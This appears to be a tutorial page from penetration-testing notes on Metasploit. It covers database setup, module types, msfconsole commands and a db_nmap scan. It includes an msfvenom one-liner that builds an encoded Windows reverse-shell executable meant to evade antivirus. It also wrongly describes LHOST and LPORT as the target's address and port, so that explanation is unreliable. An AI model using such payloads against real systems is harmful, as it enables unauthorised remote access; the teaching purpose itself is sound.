Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Setting up database

The database in metasploit is used to store output. Postgres comes pre-installed on Kali. The commands for the database are:

  • msfdb init - Start and intialize the db

  • msfdb reinit - Delete and reinitialize the database

  • msfdb delete - Delete database and stop using it

  • msfdb start - Start the database

  • msfdb stop - Stop the database

  • msfdb status - Check service status

  • msfdb run - Start the database and run msfconsole

For now to start the database we want to reinit so all data is deleted and the database is restarted

kali@kali:~$ msfdb reinit

Afterwards run the msfconsole so we can check the status of the database

msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
msf5 > 
# Good to go

Modules

Metasploit comes with many modules pre-installed. The modules are categorized under:

  • Auxilliary - Contains alternate exploits and enumeration scripts

  • Encoders - Contains encoders that assist in encoding payloads

  • Evasion - Contains scripts that help evade defender software

  • Exploits - Organized into folders based on device then exploit.

  • NOPS - Cardinal operations

  • Payloads - Categorized into Singles, Stagers, and Stages

  • Post - Post exploitation modules

MSF Venom

MSFVenom is a metasploit standalone payload generator. You can use MsFVenom on it's own to specify a framework, encoder, executable format, etc.. to be used.

To generate a payload with the msfvenom command:

kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=<host> LPORT=<port> -a x86 -b "\x00" -e x86/shikata_ga_nai -f exe > payload.exe

Let's break down what's going on in the command:

  • msfvenom: Calling the msfvenom generator

  • -p windows/shell_reverse_tcp: The P is the payload flag, and the string is the payload name

  • LHOST: The host IP of the target system.

  • LPORT: The specified port of the target system. Default is 4444.

  • -a x86: Architecture specification.

  • -f exe: Format of the payload. In this case a .exe executable.

  • -b "\x00": Removal of bad ( null ) character bytes.

  • -e x86/shikata_ga_nai: The encoder.

  • > payload.exe: The output file name for the payload.

Encoders

The encoder can be ran multiple times on the same payload using the -i { iteration number} command. This runs the payload through 3 iterations of the encoder increasing it's size but also it's encoded strength.

MSFCONSOLE

Searching

You can use the extensive search queries in msfconsole to find whatever you're looking for. The search command looks like search <string> type:exploit.

Use

When you find a program you'd like to utilize, you can run the use command to load the program: use <program name>.

While inside an exploit you can use the show options command to determine what configuration needs to be set up.

Set

While an exploit is loaded you can use the set <option> <value> command to set the configuration options.

Unset

The reverse as Set. To unload a config use the unset <option> command.

Run

To run the exploit use the run command.

Sessions

Use the sessions -l command to view any active sessions.

Back

To back out of using an exploit type the back command to be brought back to the menu.

Port Scanning

Port scanning through msfconsole is very similar to running the nmap tool.

msf5 > db_nmap -v -n -Pn -sV 192.0.0.1

The difference is the results are stored in the database and commands can be run to retrieve specific results.

msf5 > hosts # To view all hosts
msf5 > services # To view active services
msf5 > db_export -f xml scan.xml # To export the results

You can find alternative port scanners for specific scans by using search search portscan.

PreviousSMB EnumerationNextExploit Example

Last updated